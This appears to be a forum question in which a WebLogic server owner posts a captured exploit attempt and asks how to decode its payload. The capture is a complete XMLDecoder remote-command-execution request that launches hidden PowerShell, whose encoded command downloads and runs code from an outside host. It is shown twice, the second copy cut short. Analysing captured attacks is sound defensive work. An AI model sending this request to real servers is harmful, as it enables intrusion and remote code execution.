trojan81
asked on
web server category
Wireshark capture on Oracle remote command execution attempt
experts, I captured the packet of an exploit attempt on my oracle weblogic server.
I am not able to decode the powershell command. It appears to be base64 encoded. Can anyone tell me why I can't decrypt it?
Contents of the TCP stream below:
POST /wls-wsat/CoordinatorPortT ype HTTP/1.1
Host: 100.100.80.50:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecod er">
<void class="java.lang.ProcessBu ilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIA BXAGkAbgAz ADIAXwBPAH AAZQByAGEA dABpAG4AZw BTAHkAcwB0 AGUAbQApAC 4AQwBhAHAA dABpAG8Abg A7ACQAVwBD AD0ATgBlAH cALQBPAGIA agBlAGMAdA AgAE4AZQB0 AC4AVwBlAG IAQwBsAGkA ZQBuAHQAOw AkAFcAQwAu AEgAZQBhAG QAZQByAHMA WwAnAFUAcw BlAHIALQBB AGcAZQBuAH QAJwBdAD0A IgBQAG8Adw BlAHIAUwBo AGUAbABsAC 8AVwBMACsA IAAkAE8AUw AiADsASQBF AFgAIAAkAF cAQwAuAEQA bwB3AG4AbA BvAGEAZABT AHQAcgBpAG 4AZwAoACcA aAB0AHQAcA A6AC8ALwAx ADEAMQAuAD IAMwAwAC4A MgAyADkALg AyADIANgAv AGkAbQBhAG cAZQBzAC8A dABlAHMAdA AvAEQATAAu AHAAaABwAC cAKQA7AA== </string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
experts, I captured the packet of an exploit attempt on my oracle weblogic server.
I am not able to decode the powershell command. It appears to be base64 encoded. Can anyone tell me why I can't decrypt it?
Contents of the TCP stream below:
POST /wls-wsat/CoordinatorPortT
Host: 100.100.80.50:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecod
<void class="java.lang.ProcessBu
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIA
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER